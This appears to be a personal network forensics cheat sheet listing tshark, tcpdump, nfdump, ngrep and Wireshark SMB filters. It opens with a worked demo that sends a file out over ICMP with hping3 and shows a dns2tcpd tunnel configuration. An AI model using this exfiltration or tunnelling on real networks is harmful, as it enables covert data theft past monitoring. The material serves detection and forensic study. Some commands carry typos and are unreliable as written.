Hacking Network Forensics Wireshark

Data exfiltration over ICMP

hping3 using kali linux

-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95
HPING (eth0 icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip= ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip= ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip= ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip= ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in file send “dns2tcp.txt”

root@kali:~# cat dns2tcp.txt

cat dns2tcpdrc

listen =
port = 53
user = nobody
chroot = /tmp/
domain =
resources = ssh:
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on receiving end using Wireshark


icmp display filter

First session contains first part of the original file
Second session the rest of the file etc.
Network Forensics

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr


tshark -r file -Y  <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort –nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ‘ contains “google” and http.request’

  • Determine POST to domain

tshark -n -r /cases/*.pcap -Y ‘ contains “dropbox.xom” and http.request.method == “POST”‘

  • Observe content in frame number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’ -T fields -e

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y ‘’ -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web url requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y ‘http.request.uri contains “dropbox”‘


md5sum cases.pcapl


sudo tcpdump -n -i eth0 -s 0 “arp”

sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net”


  • List pcap filename/md5/start/end – capture times

capinfos -T -H -a -e *.pcap /cases/*


editcap -A ‘2015-11-15 00:00:00’ -B ‘2015-11-16 00:00:00:00’ /cases/*.pcap ~/smaller.pcap


  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain base64 code from follow stream in wireshark and save to file

cat base64-from-url.txt | > native-base64.txt

decode base64 data in a new file

base64 -di native-base64.txt > decode-base64.bin

  • check intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe


sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and contains “google”

http.request.method == “post” and contains “”


  • Order by amount of bytes, Aggregate on proto type

nfdump -O bytes -o extended -R cases/ ‘ip’ -A proto

  • Show only session with SYN flag, order by packets, aggregate scr & dst ip’s

nfdump -O packets -R cases/ -A srcip,dstip ‘proto tcp and src ip and flags S and not flags AFRPU’

  • Example with custom format and filer

nfdump -O packets -A dstip -t ‘2015/07/15-2015/08/15’ -R cases/ -o ‘fmt:%da %pkt %fl %bpp’ ‘proto tcp and src ip and flags S and not flags AFRPU and (dst ip or dst ip or dst ip’

  • Output formats

-o long, extended

-o “fmt:%sa %da”

Tag Description Tag Description
%ts Start Time – first seen %in Input Interface num
%te End Time – last seen %out Output Interface num
%td Duration %pkt Packets
%pr Protocol %byt Bytes
%sa Source Address %fl Flows
%da Destination Address %pkt Packets
%sap Source Address:Port %flg TCP Flags
%dap Destination Address:Port%tos %tos Tos
%sp Source Port %bps bps – bits per second
%dp Destination Port %pps pps – packets per second
%sas Source AS %bpp bps – Bytes per package
%das Destination AS

-B flow direction based on port number >1024 client <1024 server

nfdump -B -O tstart -o extended -R 2013/ -o ‘fmt:%ts %te %sa %da %d’ ‘proto tcp and src ip and flags S and not flags AFRPU’





–enable referrer

SMB protocol Wirieshark filters

SMB sessions active untill:

-The network connection times out

-The users closes the session

-The user de-authenticates

-The connection fails a server-side security check

Protocal Negotiation  “smb.cmd == 0x72”

LANMAN/ NTLM negotiation

Session Establishment   “smb.cmd == 0x73”

The spnego.negResult field indicates if authentication was successfull result = 0x00

Process ID # gives indication if authentication is initiated by a core system <1000 or user level process >1000

All sessions are uniquely identified by the Multiplex ID so client and server can pair reponse packets

When authentication is successful a USER ID is added which is only valid during the same SMB session

Accessing Service “smb.cmd == 0x75”

Request access to resource

Server checks, if successfull a Tree ID is added

Network Directory  “smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004”

Opening a file “smb.cmd == 0xa2”

If a client is permitted access to a file, the server returns a FID ID. This value should not be used to track file access instead use:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request        “smb.cmd == 0xa2” and !smb.fid and smb.file

Locking file for access     “smb.cmd == 0x24”

Reading from file             “smb.cmd == 0x2e”

Closing a file                       “smb.cmd == 0x04”

Tree Disconnect               “smb.cmd == 0x71”

Uses corresponding Tree ID

Logoff                                   “smb.cmd == 0x74”

Uses corresponding UID & PID

Process ID == 996 == 0x03e4
User ID smb.uid
Tree ID smb.tid
File ID smb.fid
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2

Collecting log evidence

Firewall files





IDS files










-d                            destination ip

-i                             input interface

-o                            output interface

-p                            layer 4 proto

–dport                                 destination port

–syn                      match packets with only SYN flags

-j LOG                   Log matched traffic

-j REJECT              Reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.type == 1’ –T fields –e ip.src –e ssl.record.version –e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk ‘{print $3}’ | sort | uniq –c | sort –nr

  • Identify SSL certificate subject

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.certificate’ –T fields –E separator=\ | -E aggregator=\ | -e x509ce.dNSName –e x509sat.teletexString –e x509sat.uTF8String –e x509sat.universalString –e x509sat.IA5String | tr –s \ | ‘\n’ | sort | uniq –c | sort –nr


  • Search PCAP for strings

ngrep -I dump6.pcap -w ‘root’ -N -t –q

  • Search PCAP for hex value

ngrep -I dump6.pcap  -xX ‘0xc5d5e5f55666768696a6b6c6d6e6’ -N -t –q


  • Extract files (auto file carving) from pcap

tcpxtract -f dump3.pcap